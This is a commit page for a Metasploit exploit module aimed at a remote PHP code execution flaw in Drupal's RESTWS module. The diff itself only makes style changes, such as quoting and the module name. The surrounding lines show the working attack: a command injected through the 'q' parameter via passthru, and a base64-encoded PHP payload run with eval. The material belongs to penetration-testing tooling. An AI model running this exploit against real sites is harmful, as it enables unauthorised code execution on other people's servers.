Skip to content

Commit b49a847

Browse files
committed
Fix additional things
1 parent 51bb950 commit b49a847

File tree

1 file changed

+4
-4
lines changed

1 file changed

+4
-4
lines changed

modules/exploits/unix/webapp/drupal_restws_exec.rb

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
1010

1111
def initialize(info={})
1212
super(update_info(info,
13-
'Name' => 'Drupal RESTWS Module 7.x Remote PHP Code Execution',
13+
'Name' => 'Drupal RESTWS Module Remote PHP Code Execution',
1414
'Description' => %q{
1515
This module exploits a Remote PHP Code Execution vulnerability in
1616
Drupal RESTWS Module. Unauthenticated users can execute arbitrary code
@@ -48,7 +48,7 @@ def initialize(info={})
4848

4949
register_options(
5050
[
51-
OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/'])
51+
OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/'])
5252
]
5353
)
5454
end
@@ -57,7 +57,7 @@ def check
5757
r = rand_text_alpha(8 + rand(4))
5858
res = send_request_cgi(
5959
'method' => 'GET',
60-
'uri' => normalize_uri(target_uri.path, "index.php"),
60+
'uri' => normalize_uri(target_uri.path, 'index.php'),
6161
'vars_get' => {
6262
'q' => "taxonomy_vocabulary//passthru/echo #{r}"
6363
}
@@ -73,7 +73,7 @@ def exploit
7373
cmd = "php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'"
7474
send_request_cgi(
7575
'method' => 'GET',
76-
'uri' => normalize_uri(target_uri.path, "index.php"),
76+
'uri' => normalize_uri(target_uri.path, 'index.php'),
7777
'vars_get' => {
7878
'q' => "taxonomy_vocabulary//passthru/#{cmd}"
7979
}

0 commit comments

Comments
 (0)